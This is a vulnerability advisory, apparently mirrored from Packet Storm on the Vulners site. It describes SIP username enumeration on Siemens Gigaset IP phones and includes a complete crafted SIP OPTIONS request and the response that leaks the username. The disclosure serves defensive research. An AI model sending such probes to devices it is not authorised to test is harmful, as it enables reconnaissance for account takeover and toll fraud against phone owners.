Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Siemens Gigaset IP Series SIP Username Enumeration

🗓️ 23 Aug 2011 00:00:00Reported by Francesco TornieriType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

Siemens Gigaset SIP Username Enumeration via Crafted SIP OPTIONS Metho

Code
`Siemens Gigaset ip series sip username enumeration  
  
Author: francesco.tornieri \"At\" verona-wireless.net   
Summary: Sip responses permit user identification  
Release Date: 23/08/2011  
Criticality level: Low  
Impact: Information leak  
Device: Siemens Gigaset IP series (Tested A580IP)  
  
Description:  
  
I've configured my own device in this way:  
  
------------------------  
Siemens Gigaset SIP Configuration Form  
------------------------  
IP: 192.168.1.253  
Authentication Name: 500  
Authentication Password: 500  
Username: 500   
Display Name: dect  
  
Authentication Name and Username field have to be the same otherwise the device doesn't registers to the PBX.   
It's possible to enumerate SIP username through use craft OPTIONS method, if you send an OPTIONS with a craft null "From" header (ex: From: <sip:@192.168.1.253:5060>) you obtain in response a "Contact" header that contains phone's username SIP field (ex:Contact: <sip:[email protected]:5060>).  
  
------------------------  
Craft Sip OPTIONS example  
------------------------  
  
OPTIONS sip:@192.168.1.253:5060 SIP/2.0  
Via: SIP/2.0/UDP 192.168.1.253:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport  
Max-Forwards: 70  
From: <sip:@192.168.1.253:5060>;tag=642d29cd-0671-e011-81a1-a1816009ca7a  
To: <sip:[email protected]:5060>  
Call-ID: d168fe2114a87ab560886720ab19392c  
CSeq: 199 OPTIONS  
User-Agent: FT  
Content-Length: 0  
  
Response:  
---  
Received: SIP/2.0 200 OK  
Via: SIP/2.0/UDP 192.168.1.253:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport=36675;received=192.168.1.1  
From: <sip:192.168.1.253:5060>;tag=642d29cd-0671-e011-81a1-a1816009ca7a  
To: <sip:[email protected]:5060>;tag=2470224496  
Call-ID: 581bac10541a39c50df52ed2d88297ff  
CSeq: 199 OPTIONS  
Contact: <sip:[email protected]:5060> <----- 500 SIP Username field  
...  
---  
  
Francesco Tornieri  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Aug 2011 00:00Current
0.7Low risk
Vulners AI Score0.7
siemens gigasetsip username enumerationcrafted options methodinformation leakdevice security
31